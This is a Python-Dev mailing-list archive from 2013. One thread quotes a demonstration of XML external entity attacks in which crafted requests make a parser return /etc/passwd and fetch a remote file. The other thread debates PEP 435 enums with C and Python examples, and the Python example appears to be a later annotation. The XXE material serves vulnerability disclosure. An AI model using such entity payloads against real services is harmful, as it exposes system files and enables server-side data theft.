Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python

2013-02-24 Thread M.-A. Lemburg
Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
> Am 21.02.2013 11:32, schrieb Antoine Pitrou:
>> You haven't proved that these were actual threats, nor how they
>> actually worked. I'm gonna remain skeptical if there isn't anything
>> more precise than "It highly depends on the parser and the application
>> what kind of exploit is possible".
> 
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
> 
> $ ./python-external.py
> 
> REQUEST:
> 
> Aachen
> 
> RESPONSE:
> -
> The weather in Aachen is terrible. 
> 
> REQUEST:
> 
> 
>  
> ]>
> &passwd;
> 
> 
> RESPONSE:
> -
> Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi
> 
> 
> REQUEST:
> 
> 
>   "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem";>
> ]>
> &url;
> 
> 
> RESPONSE:
> -
> Unknown city -BEGIN DH PARAMETERS-
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -END DH PARAMETERS-
> 
> These are the 512 bit DH parameters from "Assigned Number for SKIP
> Protocols"
> (http://www.skip-vpn.org/spec/numbers.html).
> See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a
> safe prime.
> 
> 
> 
> Q.E.D.
> Christian
> ___
> Python-Dev mailing list
> [email protected]
> http://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: 
> http://mail.python.org/mailman/options/python-dev/mal%40egenix.com
> 

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 24 2013)
>>> Python Projects, Consulting and Support ...   http://www.egenix.com/
>>> mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
>>> mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
[email protected]
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] [Python-checkins] peps: Pre-alpha draft for PEP 435 (enum). The name is not important at the moment, as

2013-02-24 Thread Barry Warsaw
On Feb 23, 2013, at 04:02 PM, Stefan Krah wrote:

>> +Ordered comparisons between enumeration values are *not* supported.  Enums
>> are +not integers!
>
>Hmm. I think this limits interoperation with C libraries and prototyping
>C code.

This is mostly a red-herring.  flufl.enum values are C-level int compatible
without actually *being* ints.

E.g.

#include <Python.h>

/* "i" converts with PyLong_AsLong(), which accepts any object that
   provides an integer conversion hook (__index__ on current CPython,
   __int__ on the interpreters of 2013), not only int instances; a value
   outside the C int range is rejected with OverflowError. */
static PyObject *
intcompat_printint(PyObject *self, PyObject *args)
{
    int value;
    if (!PyArg_ParseTuple(args, "i", &value))
        return NULL;

    printf("and the value is: %d\n", value);
    Py_RETURN_NONE;
}

>>> from _intcompat import *
>>> printint(7)
and the value is: 7
>>> from flufl.enum import make
>>> Colors = make('Colors', 'red green blue'.split())
>>> printint(Colors.green)
and the value is: 2

Full module code is here:

http://bazaar.launchpad.net/~barry/+junk/intcompat/files

Cheers,
-Barry




Re: [Python-Dev] [Python-checkins] peps: Pre-alpha draft for PEP 435 (enum). The name is not important at the moment, as

2013-02-24 Thread Ethan Furman

On 02/24/2013 05:40 PM, Barry Warsaw wrote:

On Feb 23, 2013, at 04:02 PM, Stefan Krah wrote:


+Ordered comparisons between enumeration values are *not* supported.  Enums
are +not integers!


Hmm. I think this limits interoperation with C libraries and prototyping
C code.


This is mostly a red-herring.  flufl.enum values are C-level int compatible
without actually *being* ints.

E.g.

static PyObject *
intcompat_printint(PyObject *self, PyObject *args)
{
    int value;
    if (!PyArg_ParseTuple(args, "i", &value))
        return NULL;

    printf("and the value is: %d\n", value);
    Py_RETURN_NONE;
}

>>> from _intcompat import *
>>> printint(7)
and the value is: 7
>>> from flufl.enum import make
>>> Colors = make('Colors', 'red green blue'.split())
>>> printint(Colors.green)
and the value is: 2


Okay, that's pretty cool.

I would still like the int subclass, though, as it would be an aid to me on the 
Python side.

--
~Ethan~
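The mechanism Barry's `_intcompat` module relies on, in Barry's message and again in Ethan's reply quoting it, shown without compiling a C extension: an added Python example (my code, not flufl.enum's and not the PEP's). A hypothetical EnumValue class is not an int subclass but defines __index__, which is the hook PyLong_AsLong(), and hence PyArg_ParseTuple's "i" converter, uses on current CPython (the 2013 interpreter went through __int__, so both are defined); struct's "i" code uses the same hook, so it stands in for printint(). The block also shows that the ordered comparison the PEP draft rules out raises TypeError. The `make` helper numbers members from 1 to match the quoted session (Colors.green is 2); its internals are my own, not flufl.enum's.

```python
import operator
import struct
import types


class EnumValue:
    """Hypothetical stand-in for a flufl.enum value (my own code): not an
    int subclass, but accepted wherever CPython asks an object for a C
    integer, because it defines __index__."""

    __slots__ = ("enum", "name", "value")

    def __init__(self, enum, name, value):
        self.enum = enum
        self.name = name
        self.value = value

    def __index__(self):
        # PyLong_AsLong(), behind PyArg_ParseTuple's "i" converter on current
        # CPython, and struct's "i" code both call this hook.
        return self.value

    __int__ = __index__  # older CPython used nb_int for the same conversion

    def __repr__(self):
        return "<EnumValue %s.%s: %d>" % (self.enum, self.name, self.value)

    def __eq__(self, other):
        return (isinstance(other, EnumValue)
                and self.enum == other.enum and self.value == other.value)

    def __hash__(self):
        return hash((self.enum, self.value))

    # Ordered comparisons are deliberately unsupported, as in the PEP draft:
    # NotImplemented from both operands makes `<` raise TypeError.
    def _unordered(self, other):
        return NotImplemented

    __lt__ = __le__ = __gt__ = __ge__ = _unordered


def make(enum_name, names):
    """Build members numbered from 1, matching the quoted session
    (Colors.green -> 2); the implementation is mine, not flufl.enum's."""
    members = {n: EnumValue(enum_name, n, i) for i, n in enumerate(names, 1)}
    return types.SimpleNamespace(**members)


def c_int_of(member):
    """The value a C function receives from PyArg_ParseTuple(args, "i", &v):
    the same conversion, done from Python via operator.index()."""
    return operator.index(member)


def through_c_int(member):
    """Pack the member as a native C int with struct's "i" code (same hook,
    so no int() call is needed) and unpack it again."""
    return struct.unpack("i", struct.pack("i", member))[0]


def supports_ordering(a, b):
    """True if `a < b` is allowed; False when it raises TypeError."""
    try:
        a < b
    except TypeError:
        return False
    return True


if __name__ == "__main__":
    Colors = make("Colors", "red green blue".split())
    print("and the value is: %d" % c_int_of(Colors.green))
    print(through_c_int(Colors.blue), isinstance(Colors.green, int))
    print(supports_ordering(Colors.red, Colors.blue))
```

The indexing case is the one to keep in mind when reviewing such a class: anything with __index__ is also accepted by sequence subscripts, range(), and bytes(), so a member can silently act as an offset in places where an explicit int() call would have been the reviewer's cue.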